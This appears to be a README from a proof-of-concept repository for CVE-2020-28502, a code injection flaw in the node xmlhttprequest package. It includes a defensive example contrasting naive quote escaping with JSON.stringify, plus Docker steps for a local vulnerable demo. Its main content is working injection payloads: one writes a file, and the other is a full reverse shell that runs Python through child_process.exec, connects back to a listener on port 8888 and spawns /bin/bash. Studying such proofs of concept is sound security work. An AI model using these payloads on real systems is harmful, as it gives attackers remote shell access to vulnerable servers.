s-index/CVE-2020-28502


CVE-2020-28502 node-XMLHttpRequest RCE

NVD Description

This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.
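The following is an added example, not code from this repository or from node-XMLHttpRequest. It models the class of flaw described above under the assumption that the synchronous path builds script source with the request body inside a single-quoted literal and escapes only `'`; `embedNaive`, `embedSafe`, `afterFirstLiteral` and `staysData` are hypothetical names, and the check is purely static, so nothing is executed.

```javascript
// Hypothetical model of the unsafe pattern: escape only single quotes, then
// place the data inside a single-quoted literal in generated source.
function embedNaive(data) {
  return "req.write('" + data.replace(/'/g, "\\'") + "');";
}

// Hardened form: JSON.stringify emits a double-quoted literal with backslashes,
// quotes and control characters escaped. U+2028/U+2029 are escaped as well for
// engines that predate ES2019.
function embedSafe(data) {
  const lit = JSON.stringify(String(data))
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return 'req.write(' + lit + ');';
}

// Static check: scan the source from the opening quote and return whatever
// follows the closing quote of the first string literal.
function afterFirstLiteral(source) {
  const start = source.search(/['"]/);
  const quote = source[start];
  for (let i = start + 1; i < source.length; i++) {
    if (source[i] === '\\') { i++; continue; }   // skip the escaped character
    if (source[i] === quote) return source.slice(i + 1);
  }
  return null;                                   // literal never terminated
}

// The data stayed inside the literal only if the call closes right after it.
function staysData(source) {
  return afterFirstLiteral(source) === ');';
}

// Constructed, harmless inputs: a plain body, a body with a quote, and a body
// where a backslash precedes the quote (the shape of this page's payloads).
const samples = ['name=alice', "it's fine", "\\');marker();//"];
for (const s of samples) {
  console.log(JSON.stringify(s), 'naive:', staysData(embedNaive(s)),
              'safe:', staysData(embedSafe(s)));
}
```

The third sample reports `false` for the naive form because the input's own backslash escapes the backslash that the quote-only replacement inserts, leaving the quote free to close the literal.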

Demo


Set Up

  1. Build an image from a Dockerfile
$ docker build -t cve-2020-28502 .
  2. Run node app.js in a new container
$ docker run --rm -p 3000:3000 cve-2020-28502
  3. Access http://localhost:3000


PoC Payload

Add file

Submit Payload

\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Reverse Shell

  1. Listen on the client
$ nc -l 8888
  2. Submit Payload

Change the IP address (192.168.0.25) to your local IP address.

\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Reference
